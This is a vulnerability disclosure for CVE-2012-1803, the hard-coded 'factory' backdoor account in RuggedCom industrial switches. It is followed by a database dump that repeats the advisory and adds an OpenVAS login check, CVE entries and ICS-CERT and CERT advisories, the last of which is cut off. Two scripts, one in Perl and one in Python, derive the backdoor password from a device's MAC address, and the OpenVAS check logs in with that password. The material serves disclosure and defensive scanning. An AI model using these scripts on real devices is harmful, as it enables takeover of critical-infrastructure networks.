Title: Undocumented Backdoor Access to RuggedCom Devices
Author: jc
Organization: JC CREW
Date: April 23, 2012
CVE: CVE-2012-1803
Background:
RuggedCom is one of a handful of networking vendors who capitalize on
the market for "Industrial Strength" and "Hardened" networking
equipment. You'll find their gear installed in traffic control
systems, railroad communications systems, power plants, electrical
substations, and even US military sites. Beyond simple L2 and L3
networking, these devices are also used for serial-to-IP conversion in
SCADA systems, and they even support Modbus and DNP3. RuggedCom
published a handy guide to some of their larger customers at
www.ruggedcom.com/about/customers/. My favorite quote is from a
contractor who installed RuggedCom equipment at a US Air Force base:
"Reliability was not an option." How unfortunately apropos.
Problem:
An undocumented backdoor account exists within all released versions
of RuggedCom's Rugged Operating System (ROS®). The username for the
account, which cannot be disabled, is "factory" and its password is
dynamically generated based on the device's MAC address. Multiple
attempts have been made in the past 12 months to have this backdoor
removed and customers notified.
Exploit:
#!/usr/bin/perl
# Print usage and quit when no MAC address was given on the command line.
if (! defined $ARGV[0]) {
    print "+========================================== \n";
    print "+ RuggedCom ROS Backdoor Password Generator \n";
    print "+ JC CREW April 23 2012 \n";
    print "+ Usage:\n$0 macaddress \n";
    print "+========================================== \n";
    exit; }
$a = $ARGV[0];
$a =~ s/[^A-F0-9]+//simg;        # keep only the hex digits (any separator, either case)
@b = reverse split /(\S{2})/,$a; # split into two-character octets and reverse their order
$c = join "", @b;
$c .= "0000";                    # append four zero nibbles (16 hex digits total)
$d = hex($c) % 999999929;        # read as hex and reduce modulo the fixed constant
print "$d\n";                    # the result is the "factory" password
Example usage:
Given a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some
perl and learn that the password for "factory" is 60644375.
[jc@pig.aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00
60644375
[jc@pig.aids ros]$
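The derivation above, reimplemented here as an added example in Python (not code from the advisory, from JC CREW or from RuggedCom) so that each step is explicit: keep the hex digits, reverse the octet order, append "0000", read as hex, reduce modulo 999999929. It also shows why the account has effectively no secret: the modulus bounds the password to fewer than 2^30 values, and the input to the calculation, the MAC address, is printed in the device's pre-authentication banner (the banner regex is the one used by the OpenVAS check quoted further down this page). The function names and the sample banner are constructed for this example and are not taken from a real device.

```python
import math
import re
from typing import Optional

# The constant the advisory's Perl script reduces by; it bounds the password space.
MODULUS = 999_999_929


def factory_password(mac: str) -> int:
    """Derive the "factory" password exactly as the advisory's script does.

    Accepts any common MAC notation (00-0A-DC-00-00-00, 00:0a:dc:00:00:00,
    000adc000000); the Perl version's /i flag likewise keeps lowercase digits.
    """
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"expected a 48-bit MAC address, got {mac!r}")
    octets = [digits[i:i + 2] for i in range(0, 12, 2)]
    # Reverse octet order (not nibble order), then append four zero nibbles.
    reversed_hex = "".join(reversed(octets)) + "0000"
    return int(reversed_hex, 16) % MODULUS


# Pattern from the OpenVAS plugin quoted on this page: the MAC sits in the
# pre-authentication telnet banner of unpatched ROS firmware.
_BANNER_MAC = re.compile(r"MAC Address:[ ]+([0-9A-F-]+)")


def mac_from_banner(banner: str) -> Optional[str]:
    """Return the MAC address a ROS login banner discloses, or None if absent."""
    match = _BANNER_MAC.search(banner)
    return match.group(1) if match else None


def password_space_bits() -> float:
    """Upper bound on the password's entropy: log2 of the modulus (just under 30 bits)."""
    return math.log2(MODULUS)


# Constructed sample banner (not captured from a real device). The fixed
# firmware versions remove this device information from the login banner.
SAMPLE_BANNER = (
    "Rugged Operating System\n"
    "MAC Address:    00-0A-DC-00-00-00\n"
    "Enter User Name:"
)

if __name__ == "__main__":
    mac = mac_from_banner(SAMPLE_BANNER)
    print(f"banner discloses MAC {mac}; derived password {factory_password(mac)}")
    print(f"password space is at most {password_space_bits():.1f} bits")
```

For an asset owner the practical reading is the last two numbers: a password bounded to under 30 bits is small even if it were secret, and here the only input is broadcast to anyone who reaches the telnet service, which is why the vendor's fix removes the account entirely rather than changing the formula.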
Shoutouts:
CERT/CC for doing great work in trying to get vendors to actually fix things.
JC CREW
Timeline:
Apr 2011 - Vendor notified directly
Jul 2011 - Vendor verbally acknowledges knowledge of backdoor,
and ceases communication.
Feb 11 2012 - US-CERT notified
Mar 12 2012 - Vendor responds to US-CERT.
Apr 06 2012 - Due to lack of further contact by vendor, CERT sets
public disclosure for April 13 2012
Apr 10 2012 - Vendor states they need another three weeks to alert
their customers, but not fix the vulnerability.
Apr 11 2012 - Clarification requested regarding need for additional three weeks.
Apr 23 2012 - No response from vendor.
Apr 23 2012 - This disclosure.
Keywords:
RuggedCom
ROS
RuggedSwitch
RuggedServer
backdoor
{"exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nRuggedCom Devices - Backdoor Access", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "exploitpack", "title": "RuggedCom Devices - Backdoor Access", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803"], "modified": "2012-04-24T00:00:00", "id": "EXPLOITPACK:7023CE928862A6C91F9E129FBE1EB5CE", "href": "", "sourceData": "Title: Undocumented Backdoor Access to RuggedCom Devices\nAuthor: jc\nOrganization: JC CREW\nDate: April 23, 2012\nCVE: CVE-2012-1803\n\nBackground:\nRuggedCom is one of a handful of networking vendors who capitalize on\nthe market for \"Industrial Strength\" and \"Hardened\" networking\nequipment. You'll find their gear installed in traffic control\nsystems, railroad communications systems, power plants, electrical\nsubstations, and even US military sites. Beyond simple L2 and L3\nnetworking these devices are also used for serial-to-ip converstion in\nSCADA systems and they even support modbus and dnp3. RuggedCom\npublished a handy guide to some of their larger customers at\nwww.ruggedcom.com/about/customers/. My favorite quote is from a\ncontractor who installed RuggedCom equipment at a US Air Force base:\n\"Reliability was not an option.\" How unfortunately apropos.\n\nProblem:\nAn undocumented backdoor account exists within all released versions\nof RuggedCom's Rugged Operating System (ROS\u00ae). 
The username for the\naccount, which cannot be disabled, is \"factory\" and its password is\ndynamically generated based on the device's MAC address. Multiple\nattempts have been made in the past 12 months to have this backdoor\nremoved and customers notified.\n\nExploit:\n#!/usr/bin/perl\nif (! defined $ARGV[0]) {\nprint \"+========================================== \\n\";\nprint \"+ RuggedCom ROS Backdoor Password Generator \\n\";\nprint \"+ JC CREW April 23 2012 \\n\";\nprint \"+ Usage:\\n$0 macaddress \\n\";\nprint \"+========================================== \\n\";\nexit; }\n$a = $ARGV[0];\n$a =~ s/[^A-F0-9]+//simg;\n@b = reverse split /(\\S{2})/,$a;\n$c = join \"\", @b;\n$c .= \"0000\";\n$d = hex($c) % 999999929;\nprint \"$d\\n\";\n\nExample usage:\nGiven a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some\nperl and learn that the password for \"factory\" is 60644375.\n\n[jc (at) pig (dot) aids [email concealed] ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00\n60644375\n[jc (at) pig (dot) aids [email concealed] ros]$\n\nShoutouts:\nCERT/CC for doing great work in trying to get vendors to actually fix things.\nJC CREW\n\nTimeline:\nApr 2011 - Vendor notified directly\nJul 2011 - Vendor verbally acknowledges knowledge of backdoor,\nand ceases communication.\nFeb 11 2012 - US-CERT notified\nMar 12 2012 - Vendor responds to US-CERT.\nApr 06 2012 - Due to lack of further contact by vendor, CERT sets\npublic disclosure for April 13 2012\nApr 10 2012 - Vendor states they need another three weeks to alert\ntheir customers, but not fix the vulnerability.\nApr 11 2012 - Clarification requested regarding need for additional three weeks.\nApr 23 2012 - No response from vendor.\nApr 23 2012 - This disclosure.\n\nKeywords:\nRuggedCom\nROS\nRuggedSwitch\nRuggedServer\nbackdoor", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-10-11T19:27:40", "description": "Rugged Operating System is prone to an unauthorized-access\n 
vulnerability due to a backdoor in all versions of the application.", "cvss3": {}, "published": "2012-06-21T00:00:00", "type": "openvas", "title": "Rugged Operating System Backdoor Unauthorized Access Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1803"], "modified": "2019-10-08T00:00:00", "id": "OPENVAS:1361412562310103499", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103499", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Rugged Operating System Backdoor Unauthorized Access Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:siemens:ruggedcom_rugged_operating_system\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103499\");\n script_version(\"2019-10-08T10:38:10+0000\");\n script_bugtraq_id(53215);\n script_cve_id(\"CVE-2012-1803\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-08 10:38:10 +0000 (Tue, 08 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 13:07:51 +0200 (Thu, 21 Jun 2012)\");\n script_name(\"Rugged Operating System Backdoor Unauthorized Access Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_siemens_ruggedcom_consolidation.nasl\", \"toolcheck.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_mandatory_keys(\"siemens_ruggedcom/telnet/detected\", \"Tools/Present/perl\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/53215\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/522467\");\n script_xref(name:\"URL\", value:\"http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-12-116-01.pdf\");\n script_xref(name:\"URL\", value:\"http://www.us-cert.gov/control_systems/pdf/ICSA-12-146-01.pdf\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/889195\");\n\n script_tag(name:\"solution\", 
value:\"Updates are available. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"Rugged Operating System is prone to an unauthorized-access\n vulnerability due to a backdoor in all versions of the application.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to gain unauthorized access to the\n affected application. This may aid in further attacks.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"telnet_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\n\nif(!port = get_app_port(cpe:CPE, service:\"telnet\"))\n exit(0);\n\nif(!get_app_location(port:port, cpe:CPE))\n exit(0);\n\nbanner = telnet_get_banner(port:port);\nif(!banner || (\"Rugged Operating System\" >!< banner || \"MAC Address\" >!< banner))\n exit( 0 );\n\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nr = telnet_negotiate(socket:soc);\nif(!r || \"Rugged Operating System\" >!< r || \"MAC Address\" >!< r) {\n telnet_close_socket(socket:soc, data:r);\n exit(0);\n}\n\nmac_string = eregmatch(pattern:\"MAC Address:[ ]+([0-9A-F-]+)\", string:r);\nif(!mac_string[1]) {\n telnet_close_socket(socket:soc, data:r);\n exit(0);\n}\n\nmac = mac_string[1];\nmac = split(mac, sep:\"-\", keep:FALSE);\nif(max_index(mac) != 6) {\n telnet_close_socket(socket:soc, data:r);\n exit(0);\n}\n\nfor(x=5; x >= 0; x--) {\n mac_reverse += mac[x];\n}\n\nmac_reverse += '0000';\n\n# it seems that the resulting int is too big for nasl and computing the pass fail. 
perl also warn about an \"Integer overflow in hexadecimal\" (on 32bit) but compute right.\n# so use perl...\nargv[i++] = \"perl\";\nargv[i++] = \"-X\";\nargv[i++] = \"-e\";\nargv[i++] = 'print (hex(\"' + mac_reverse + '\") % 999999929);';\nargv[i++] = '2>/dev/null';\npass = pread(cmd:\"perl\", argv:argv, cd:FALSE);\n\nif(pass !~ \"[0-9]+\") {\n telnet_close_socket(socket:soc, data:r);\n exit(0);\n}\n\nuser = \"factory\";\n\nsend(socket:soc, data:user + '\\n');\nrecv = recv(socket:soc, length:512);\nif(!recv || \"Enter Password\" >!< recv) {\n telnet_close_socket(socket:soc, data:recv);\n exit(0);\n}\n\nsend(socket:soc, data:pass + '\\n');\nrecv = recv(socket:soc, length:2048);\ntelnet_close_socket(socket:soc, data:recv);\n\nif(\"Main Menu\" >< recv && (\"Administration\" >< recv || \"Ethernet Ports\" >< recv || \"Diagnostics\" >< recv)) {\n security_message(port:port, data:'It was possible to login into the Rugged Operating System using username \"factory\" and password \"' + pass + '\".');\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-08-14T15:03:23", "description": "RuggedCom Rugged Operating System (ROS) 3.10.x and earlier has a factory account with a password derived from the MAC Address field in the banner, which makes it easier for remote attackers to obtain access by performing a calculation on this address value, and then establishing a (1) TELNET, (2) remote shell (aka rsh), or (3) serial-console session.", "cvss3": {}, "published": "2012-04-28T00:55:00", "type": "cve", "title": "CVE-2012-1803", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": 
"AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803"], "modified": "2022-02-01T16:53:00", "cpe": ["cpe:/o:siemens:ruggedcom_rugged_operating_system:3.10.1"], "id": "CVE-2012-1803", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1803", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:siemens:ruggedcom_rugged_operating_system:3.10.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-14T17:11:01", "description": "RuggedCom Rugged Operating System (ROS) before 3.3 has a factory account with a password derived from the MAC Address field in a banner, which makes it easier for remote attackers to obtain access by performing a calculation on this address value, and then establishing a (1) SSH or (2) HTTPS session, a different vulnerability than CVE-2012-1803.", "cvss3": {}, "published": "2012-04-28T00:55:00", "type": "cve", "title": "CVE-2012-2441", "cwe": ["CWE-521"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803", "CVE-2012-2441"], "modified": "2022-02-01T16:53:00", "cpe": [], "id": "CVE-2012-2441", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2441", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": []}], "packetstorm": [{"lastseen": "2016-12-05T22:12:31", "description": "", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "packetstorm", "title": "RuggedCom Device 
Undocumented Backdoor", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1803"], "modified": "2012-04-24T00:00:00", "id": "PACKETSTORM:112149", "href": "https://packetstormsecurity.com/files/112149/RuggedCom-Device-Undocumented-Backdoor.html", "sourceData": "`Title: Undocumented Backdoor Access to RuggedCom Devices \nAuthor: jc \nOrganization: JC CREW \nDate: April 23, 2012 \nCVE: CVE-2012-1803 \n \nBackground: \nRuggedCom is one of a handful of networking vendors who capitalize on \nthe market for \"Industrial Strength\" and \"Hardened\" networking \nequipment. You'll find their gear installed in traffic control \nsystems, railroad communications systems, power plants, electrical \nsubstations, and even US military sites. Beyond simple L2 and L3 \nnetworking these devices are also used for serial-to-ip converstion in \nSCADA systems and they even support modbus and dnp3. RuggedCom \npublished a handy guide to some of their larger customers at \nwww.ruggedcom.com/about/customers/. My favorite quote is from a \ncontractor who installed RuggedCom equipment at a US Air Force base: \n\"Reliability was not an option.\" How unfortunately apropos. \n \nProblem: \nAn undocumented backdoor account exists within all released versions \nof RuggedCom's Rugged Operating System (ROS\u00ae). The username for the \naccount, which cannot be disabled, is \"factory\" and its password is \ndynamically generated based on the device's MAC address. Multiple \nattempts have been made in the past 12 months to have this backdoor \nremoved and customers notified. \n \nExploit: \n#!/usr/bin/perl \nif (! 
defined $ARGV[0]) { \nprint \"+========================================== \\n\"; \nprint \"+ RuggedCom ROS Backdoor Password Generator \\n\"; \nprint \"+ JC CREW April 23 2012 \\n\"; \nprint \"+ Usage:\\n$0 macaddress \\n\"; \nprint \"+========================================== \\n\"; \nexit; } \n$a = $ARGV[0]; \n$a =~ s/[^A-F0-9]+//simg; \n@b = reverse split /(\\S{2})/,$a; \n$c = join \"\", @b; \n$c .= \"0000\"; \n$d = hex($c) % 999999929; \nprint \"$d\\n\"; \n \nExample usage: \nGiven a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some \nperl and learn that the password for \"factory\" is 60644375. \n \n[jc@pig.aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00 \n60644375 \n[jc@pig.aids ros]$ \n \nShoutouts: \nCERT/CC for doing great work in trying to get vendors to actually fix things. \nJC CREW \n \nTimeline: \nApr 2011 - Vendor notified directly \nJul 2011 - Vendor verbally acknowledges knowledge of backdoor, \nand ceases communication. \nFeb 11 2012 - US-CERT notified \nMar 12 2012 - Vendor responds to US-CERT. \nApr 06 2012 - Due to lack of further contact by vendor, CERT sets \npublic disclosure for April 13 2012 \nApr 10 2012 - Vendor states they need another three weeks to alert \ntheir customers, but not fix the vulnerability. \nApr 11 2012 - Clarification requested regarding need for additional three weeks. \nApr 23 2012 - No response from vendor. \nApr 23 2012 - This disclosure. 
\n \nKeywords: \nRuggedCom \nROS \nRuggedSwitch \nRuggedServer \nbackdoor \n`\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112149/ruggedcom-backdoor.txt"}], "ics": [{"lastseen": "2023-09-10T06:15:22", "description": "## Overview\n\n### **\\--------- Begin Update A Part 1 of 2 --------**\n\nThis is an update to the original advisory titled ICSA-12-146-01\u2014RuggedCom Weak Cryptography for Password Vulnerability that was published May 25, 2012, on the ICS-CERT Web page. Independent researcher Justin W. Clarke identified a default backdoor user accountRuggedCom Backdoor Accounts, http://seclists.org/fulldisclosure/2012/Apr/277, Web site last accessed June 18, 2012., US-CERT Vulnerability Note, http://www.kb.cert.org/vuls/id/889195, Web site last accessed June 18, 2012., NERC Advisory, http://www.nerc.com/fileUploads/File/Events%20Analysis/A-2012-05-07-01_Ruggedcom_Unauthorized_Access_Vulnerability.pdf, Web site last accessed June 18, 2012. with a weak password encryption vulnerability in the RuggedCom Rugged Operating System (ROS). This vulnerability can be remotely exploited. Exploits that target this vulnerability are known to be publicly available.\n\nMr. Clarke provided this information to both CERT/CC and ICS-CERT. ICS-CERT coordinated a mitigation strategy with RuggedCom, a Siemens company. RuggedCom has produced new firmware versions that resolve the reported vulnerability.\n\nPrevious versions of this document erroneously stated that ICS-CERT had confirmed that the patch resolves the vulnerability. 
ICS-CERT has tested one version of the patched firmware (v3.10.1) and can confirm that the public exploits no longer work on the patched versions.\n\n### **\\--------- End Update A Part 1 of 2 ----------**\n\nThis advisory is a follow-up to ICS-ALERT-12-116-01A RuggedCom Weak Cryptography for Password that was published April 26, 2012, on the ICS-CERT Web page.\n\n## Affected Products\n\nRuggedCom RuggedSwitch or RuggedServer devices are affected using the following versions of ROS:\n\n * 3.2.x and earlier, and\n * 3.3.x and above.\n\n## Impact\n\nAn attacker can use a simple publicly available script to generate the default password and gain administrative access to the unit.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## Background\n\nRuggedCom makes network equipment that is intended for deployment in harsh environments. Their products can be found in applications such as traffic control systems, railroad communications systems, power plants, electrical substations, and military sites. Beyond Layer 2 and Layer 3 networking, these devices also provide serial-to-IP conversion in SCADA systems, and they support MODBUS and DNP3 protocols.\n\n## Vulnerability Characterization\n\n### Vulnerability Overview\n\nWeak Cryptography for PasswordsCWE, http://cwe.mitre.org/data/definitions/261.html, Web site last accessed June 18, 2012.\n\nAn undocumented backdoor account exists within all previously released versions of RuggedCom\u2019s ROS. The username for the account, which cannot be disabled, is \u201cfactory,\u201d and its password is dynamically generated based on the device\u2019s MAC address.\n\n[CVE-2012-1803](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1803>) has been assigned to this vulnerability. 
A CVSS v2 base score of 8.5 has been assigned; the CVSS vector string is [(AV:N/AC:M/Au:S/C:C/I:C/A:C)](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:M/Au:S/C:C/I:C/A:C>).\n\n### Vulnerability Details\n\n#### Exploitability\n\nThis vulnerability is exploitable remotely.\n\n#### Existence of Exploit\n\nPublic exploits are known to target this vulnerability.\n\n#### Difficulty\n\nAn attacker with a low skill level would be able to exploit this vulnerability.\n\n## Mitigation\n\n### **\\--------- Begin Update A Part 2 of 2 --------**\n\nVersions 3.10.1, 3.9.3, 3.8.5, and 3.7.9 of the ROS firmware with security-related fixes are now available and can be obtained from RuggedCom technical support at [support@ruggedcom.com](<mailto:support@ruggedcom.com>).\n\nROS v3.11.x, a new firmware release containing additional functionality as well as the same security fixes, will be released within the next few weeks; RuggedCom will release a product bulletinLatest news on ROS Device Security Issue, http://www.ruggedcom.com/productbulletin/ros-security-page/, Web site last accessed June 18, 2012. to notify customers when it is available.\n\n### **\\--------- End Update A Part 2 of 2 ---------- **\n\nTo address security issues, the following changes are included in all the new ROS firmware versions:\n\n * removal of factory account as referenced in ICSA -12-146-01 and NERC Alert A-2012-05-07-01,\n * change default condition of insecure communication services to disabled,\n * improval of security for user account password storage,\n * detection and alarm for weak password strength, and\n * removal of device information from standard login banner.\n\nNote: These new versions of the ROS firmware remove the factory account and the associated security vulnerability. 
Customers using these new versions of the firmware should take special care not to lose the user defined password to a device\u2019s administrative account as recovering from a lost administrative password will now require physical access to the device to reset the passwords.\n\nRuggedCom recommends that customers using ROS versions older than v3.7 upgrade to a newer version. If this is not possible, RuggedCom has indicated that they will address updates to older versions of the firmware on a case-by-case basis.\n\nSiemens has issued security advisory \u201cSSA-826381: Multiple Security Vulnerabilities in RuggedCom ROS-based Devices\u201d regarding this vulnerability. It can be found on the [Siemens ProductCERT advisory Web page](<http://www.siemens.com/cert/advisories/>).\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices. Critical devices should not directly face the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPN is only as secure as the connected devices.\n\nThe Control Systems Security Program (CSSP) also provides a section for control systems security recommended practices on the CSSP web page. 
Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n", "cvss3": {}, "published": "2018-09-06T12:00:00", "type": "ics", "title": "RuggedCom Weak Cryptography for Password Vulnerability (Update A)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803"], "modified": "2018-09-06T12:00:00", "id": "ICSA-12-146-01A", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-12-146-01a", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2023-05-31T14:40:41", "description": "### Overview\n\nRuggedCom Rugged Operating System (ROS) contains a hard-coded user account with a predictable password.\n\n### Description\n\n[RuggedCom Rugged Operating System](<http://www.ruggedcom.com/support/software/index.php>) (ROS), used in RuggedCom [network infrastructure devices](<http://www.ruggedcom.com/products/index.php>), contains a hard-coded user account named \"`factory`\" that cannot be disabled. The password for this account is based on the device's MAC address and can be reverse engineered easily ([CWE-261](<http://cwe.mitre.org/data/definitions/261.html>): Weak Cryptography for Passwords).\n\nROS also supports HTTP(S) and `ssh` services. 
In ROS 3.3.x, these services do not use the `factory` account. ROS does not appear to log successful or unsuccessful login attempts for the `factory` account. \n \nMore information is available in \"[Undocumented Backdoor Access to RuggedCom Devices](<http://seclists.org/fulldisclosure/2012/Apr/277>)\" and RuggedCom's [security bulletin](<http://www.ruggedcom.com/productbulletin/ros-security-page/>). \n \n--- \n \n### Impact\n\nAn attacker with knowledge of an ROS device's MAC address may be able to gain complete administrative control of the device. The MAC address is [displayed](<http://arstechnica.com/business/news/2012/04/backdoor-in-mission-critical-hardware-threatens-power-traffic-control-systems.ars>) in the pre-authentication banner. \n \n--- \n \n### Solution\n\nAccording to RuggedCom's [security bulletin](<http://www.ruggedcom.com/productbulletin/ros-security-page/>), \"_Version 3.10.1 of the ROS\u00ae firmware with security related fixes will be released on Tuesday May 22, 2012 and can be obtained by emailing support@ruggedcom.com. Other ROS\u00ae firmware versions containing the same security fixes (3.9.3, 3.8.5, 3.7.9 & 3.11.0) will be released over the next few weeks on a staggered basis as development and testing is completed._\" \n \nICS-CERT Advisory [ICSA-12-146-01A](<http://www.us-cert.gov/control_systems/pdf/ICSA-12-146-01A.pdf>) confirms that ROS version 3.10.1 is no longer affected, and that versions 3.9.3, 3.8.5, and 3.7.9 are now available. \n \n--- \n \n**Workarounds** \n \nROS 3.3.x allows users to disable the `rsh` service and set the number of allowed `telnet` connections to 0. ROS 3.2.x does not allow the `rsh` or `telnet` services to be disabled. \n \n--- \n \n### Vendor Information\n\n
### RuggedCom (Affected)\n\nNotified: February 10, 2012 Updated: July 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nRuggedCom advises ROS 3.3.x users to disable the `rsh` service and set the number of allowed `telnet` connections to 0. This vulnerability is addressed in ROS versions 3.10.1, 3.9.3, 3.8.5, and 3.7.9.\n\n### Vendor References\n\n * <http://www.ruggedcom.com/productbulletin/ros-security-page/>\n\n### Siemens (Affected)\n\nUpdated: April 24, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nRuggedCom was [acquired](<http://www.ruggedcom.com/about/investor/pr/takeover.php>) by Siemens in March 2012.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23889195 Feedback>).\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 7.3 | E:POC/RL:W/RC:C \nEnvironmental | 1.8 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://seclists.org/fulldisclosure/2012/Apr/277>\n * <http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-12-116-01.pdf>\n * <http://arstechnica.com/business/news/2012/04/backdoor-in-mission-critical-hardware-threatens-power-traffic-control-systems.ars>\n * 